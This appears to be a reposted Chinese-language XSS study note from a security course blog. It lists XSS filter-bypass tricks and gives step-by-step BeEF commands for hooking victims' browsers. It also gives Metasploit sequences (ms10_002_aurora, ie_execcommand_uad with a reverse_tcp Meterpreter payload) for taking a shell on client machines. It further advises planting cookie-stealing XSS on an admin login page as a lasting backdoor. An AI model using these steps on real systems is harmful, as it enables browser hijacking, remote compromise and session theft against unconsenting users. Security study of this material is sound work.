网络安全-XSS笔记
XSS绕过限制:
1、绕过magic_quotes_gpc
可使用javascript中的String.fromCharCode()
<script>String.fromCharCode()</scrip>
2、HEX编码
十六进制编码
https://textmechanic.com/ASCII-Hex-Unicode-Base64-Convertor.html
https://www.asciitohex.com/
3、改变大小写
4、关闭标签
5、AWVS 扫描
Kali Linux Beef劫持客户端浏览器:
cd /usr/share/beef-xss 进入目录
ls 查看目录
./beef 运行beef
UI URL:管理 网址浏览器打开 账号密码默认beef
Hook URL: 恶意代码
使用:
<script src="Hook URL"></script>
管理端 Commands Redirect Browser
beef+msf拿客户端shell (ie6 xp)
cd /usr/share/beef-xss 进入目录
./ beef 运行beef
msfconsole 运行msf
msf下执行:
use windows/browser/ms10_002_aurora
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set SRVHOST 客户端将要访问的IP
set SRVPORT 将要访问的端口
set URIPATH / 网站根目录
set LHOST 客户端回连IP
set LPORT 客户端回连端口
exploit
Using URL 为要让客户端访问的url,beef里设置
session -i 查看得到的shell
session -1 id 查看固定id的shell
shell 拿到权限
beef+msf拿客户端shell (ie7、8、9)
msf下
use exploit/windows/browser/ie_execcommand_uad
show options
set SRVHOST 回连ip
set SRVPORT 回连端口
set URIPATH /
exploit
XSS漏洞扫描工具
WVS
椰树
safe3
Xelenium
w3af
vega
xss扫描插件+burp
长期留后门,可将XSS获取cookie代码留在管理登录页面
Xss平台搭建
使用工具:
wamp2.2+xss.me源码
转载于:https://blog.51cto.com/3945465/2140843
网络安全-XSS笔记相关推荐
- 千锋教育网络安全课程笔记
网络安全课程笔记 1.虚拟环境部署 1.1 虚拟机的运行架构 寄居架构(适合用于学习) (这里的硬件就是我们的笔记本电脑) 虚拟机跟真实机是互相独立的,一些危险的程序放到虚拟机里面运行是不会影响到真实 ...
- [网络安全学习篇10]:扫描技术、暴力破解工具(千峰网络安全视频笔记 10 day)
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...
- [网络安全学习篇2]:IP详解及简单的DOS命令(千峰网络安全视频笔记 2 day)
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...
- 小白的网络安全可视化笔记(二)
小白的网络安全数据可视化笔记 小白的网络安全可视化笔记 关于数据清洗 整理方案: 网络安全态势评估法 网络安全态势评估方法及定义 基于HMM的安全传感器报警处理方法 引用 小白的网络安全可视化笔记 再 ...
- 网络安全学习笔记(适合初学者)
网络安全学习笔记 一. Ip欺骗(IP spoof)及防范原则 IP[地址]欺骗被用来从事非法活动,破坏网络安全,黑客使用IP欺骗就不会被抓到,还有一些黑客进行Dos攻击的时候,就可以隐藏真实的IP, ...
- 【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-终
后续笔记仔细看了下,放出来铁过不了审核,等有时间一点点删了再放出来. [小迪安全]web安全|渗透测试|网络安全 | 学习笔记-8 已经被封了=.= 把目录写上,假装过审核了. 接下来是持续八天的-- ...
- [网络安全学习篇6]:WEB服务器和FTP服务器(千峰网络安全视频笔记 6 day)
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...
- [网络安全学习篇21]:防火墙(千峰网络安全视频笔记 21 day)
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...
- [网络安全学习篇18]:ACL及实验(千峰网络安全视频笔记 18 day)
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...
最新文章
- BeanShell用法汇总(部分摘抄至网络)
- php 接口 2.0,YII 2.0 API接口开发
- FastReport.net分组排序、打印顺序、分页、函数使用语法、数据块编辑
- Oracle-使用awrrpt.sql生成AWR报告
- Framework中网络定位服务简介
- 计算机专用英语词汇发音,计算机专用的英语词汇
- 关于异常“The 'Microsoft.ACE.OLEDB.12.0' provider is not registered on the local machine”的处理...
- Android BroadcastReceiver中播放提示语音有时失效问题
- 用NSoup解析HTML
- componentsJoinedByString 和 componentsSeparatedByString 的方法的区别
- 腾讯offer是什么样子_月薪35K:2020腾讯Java后端开发详细面试流程
- Silverlight 全屏显示
- 不用空格怎么打两个空格_和平精英:苹果手机怎么打空格 空白名使用教程
- 用 npm script 实现构建流水线
- python没有requests模块_python没有名为“requests”的模块
- 安卓linux终端 计算,5种在Linux终端中进行算术运算的方法
- 基于CentOS7.3构建企业级Vsftpd文件服务器
- 探讨SQL Server 2005的评价函数
- python求素数代码_Python实现高效求解素数代码实例
- 【软考 系统架构设计师】软件架构设计④ 基于架构的软件开发方法